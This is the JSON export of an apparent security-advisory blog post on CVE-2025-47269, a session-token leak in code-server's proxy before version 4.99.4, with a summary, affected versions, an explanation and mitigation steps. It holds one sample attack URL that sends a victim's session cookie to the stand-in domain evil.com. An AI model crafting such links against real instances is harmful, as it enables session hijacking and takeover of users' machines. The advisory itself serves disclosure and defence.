{"id":39251,"date":"2025-05-18T01:23:25","date_gmt":"2025-05-18T01:23:25","guid":{"rendered":""},"modified":"2025-10-01T20:23:12","modified_gmt":"2025-10-02T02:23:12","slug":"cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-47269-session-token-exposure-in-code-server-prior-to-version-4-99-4\/","title":{"rendered":"<strong>CVE-2025-47269: Session Token Exposure in code-server Prior to Version 4.99.4<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. This vulnerability is significant because it lets a malicious actor obtain a user's session token, potentially leading to system compromise or data leakage.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-47269<br \/>\nSeverity: High (8.3 CVSS Score)<br \/>\nAttack Vector: Network (via crafted URL)<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: Required (victim needs to click on a malicious link)<br \/>\nImpact: System compromise, Unauthorized Access, Data Leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p>\n<table><tr><th>Product<\/th><th>Affected Versions<\/th><\/tr><tr><td>code-server<\/td><td>Prior to 4.99.4<\/td><\/tr><\/table>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The vulnerability lies in the built-in proxy feature of code-server. Prior to version 4.99.4, insufficient validation of proxy requests allows a maliciously crafted URL to proxy a connection to an arbitrary domain. Such a URL can be structured to reference the attacker&#8217;s domain, so that the victim&#8217;s session cookie is sent to the attacker&#8217;s site. With the session cookie, the attacker could log into the code-server instance and potentially gain full access to the host machine.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p>\n<p>Consider the following URL, which an attacker could craft and distribute:<\/p>\n<pre><code class=\"\" data-line=\"\">https:\/\/&lt;code-server&gt;\/proxy\/test@evil.com\/path<\/code><\/pre>\n<p>In this scenario, the attacker&#8217;s domain is <code>evil.com<\/code>. When a user clicks on this URL, their connection would be proxied to <code>test@evil.com\/path<\/code>, and their session token would be sent along with it. 
This token could then be used by the attacker to access the user&#8217;s code-server instance.<\/p>\n<p><strong>Mitigation and Recommendations<\/strong><\/p>\n<p>The developers behind code-server have addressed this issue in version 4.99.4. It is recommended to update your code-server to this version or later. If immediate updating is not possible, users can temporarily mitigate the issue by disabling the built-in proxy feature or implementing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to identify and block malicious requests. Always avoid clicking on links from untrusted sources to reduce the risk of exposure.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview In the world of cybersecurity, the discovery and mitigation of vulnerabilities are paramount to sustaining a safe digital environment. One such vulnerability is CVE-2025-47269, affecting code-server, a popular tool that allows users to run Visual Studio Code on any machine through browser access. 
This vulnerability is significant due to the potential for malicious agents [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-39251","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=39251"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions"}],"predecessor-version":[{"id":79896,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/39251\/revisions\/79896"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=39251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=39251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=39251"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=39251"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=39251"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=39251"},{"t
axonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=39251"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=39251"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=39251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}